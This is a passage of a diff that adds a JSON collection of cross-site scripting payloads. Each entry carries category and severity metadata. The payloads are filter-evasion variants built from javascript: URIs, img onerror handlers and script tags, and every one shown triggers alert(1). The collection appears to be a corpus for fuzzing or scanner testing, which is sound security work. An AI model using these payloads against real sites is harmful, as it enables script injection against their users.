href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x0Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "`\"'><img src=xxx:x \\x0Donerror=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "`\"'><img src=xxx:x \\x09onerror=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "`\"'><img src=xxx:x \\x0Conerror=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "`\"'><img src=xxx:x \\x00onerror=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "`\"'><img src=xxx:x \\x27onerror=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "`\"'><img src=xxx:x \\x20onerror=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\x3Bjavascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\x0Djavascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\x09javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\x00javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\x0Cjavascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\x2Bjavascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>-javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\x0Ajavascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\x7Ejavascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xC2\\x85javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\x21javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\x0Bjavascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\x20javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"`'><script>\\xC2\\xA0javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"/><img/onerror=\\x0Bjavascript:alert(1)\\x0Bsrc=xxx:x />", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"/><img/onerror=\\x22javascript:alert(1)\\x22src=xxx:x />", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"/><img/onerror=\\x09javascript:alert(1)\\x09src=xxx:x />", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"/><img/onerror=\\x27javascript:alert(1)\\x27src=xxx:x />", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"/><img/onerror=\\x0Ajavascript:alert(1)\\x0Asrc=xxx:x />", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"/><img/onerror=\\x0Cjavascript:alert(1)\\x0Csrc=xxx:x />", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"/><img/onerror=\\x0Djavascript:alert(1)\\x0Dsrc=xxx:x />", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"/><img/onerror=\\x60javascript:alert(1)\\x60src=xxx:x />", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"/><img/onerror=\\x20javascript:alert(1)\\x20src=xxx:x />", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script\\x2F>javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script\\x20>javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script\\x0D>javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script\\x0A>javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script\\x0C>javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script\\x00>javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script\\x09>javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "`\"'><img src=xxx:x onerror\\x0B=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "`\"'><img src=xxx:x onerror\\x00=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "`\"'><img src=xxx:x onerror\\x0C=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "`\"'><img src=xxx:x onerror\\x0D=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "`\"'><img src=xxx:x onerror\\x20=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "`\"'><img src=xxx:x onerror\\x0A=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "`\"'><img src=xxx:x onerror\\x09=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script>javascript:alert(1)<\\x00/script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src=# onerror\\x3D\"javascript:alert(1)\" >", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<input onfocus=javascript:alert(1) autofocus>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<input onblur=javascript:alert(1) autofocus><input autofocus>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<video poster=javascript:javascript:alert(1)//", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<video><source onerror=\"javascript:javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<video onerror=\"javascript:javascript:alert(1)\"><source>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<form><button formaction=\"javascript:javascript:alert(1)\">X", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body oninput=javascript:alert(1)><input autofocus>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<math href=\"javascript:javascript:alert(1)\">CLICKME</math> <math> <maction actiontype=\"statusline#http://google.com\" xlink:href=\"javascript:javascript:alert(1)\">CLICKME</maction> </math>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<frameset onload=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<table background=\"javascript:javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<!--<img src=\"--><img src=x onerror=javascript:alert(1)//\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<comment><img src=\"</comment><img src=x onerror=javascript:alert(1))//\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<![><img src=\"]><img src=x onerror=javascript:alert(1)//\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<style><img src=\"</style><img src=x onerror=javascript:alert(1)//\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<head><base href=\"javascript://\"></head><body><a href=\"/. /,javascript:alert(1)//#\">XXX</a></body>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<OBJECT CLASSID=\"clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\"><PARAM NAME=\"DataURL\" VALUE=\"javascript:alert(1)\"></OBJECT>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<b <script>alert(1)</script>0", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<div id=\"div1\"><input value=\"``onmouseover=javascript:alert(1)\"></div> <div id=\"div2\"></div><script>document.getElementById(\"div2\").innerHTML = document.getElementById(\"div1\").innerHTML;</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<x '=\"foo\"><x foo='><img src=x onerror=javascript:alert(1)//'>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<embed src=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<image src=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script src=\"javascript:alert(1)\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<? foo=\"><script>javascript:alert(1)</script>\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<! foo=\"><script>javascript:alert(1)</script>\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "</ foo=\"><script>javascript:alert(1)</script>\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<? foo=\"><x foo='?><script>javascript:alert(1)</script>'>\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<! foo=\"[[[Inception]]\"><x 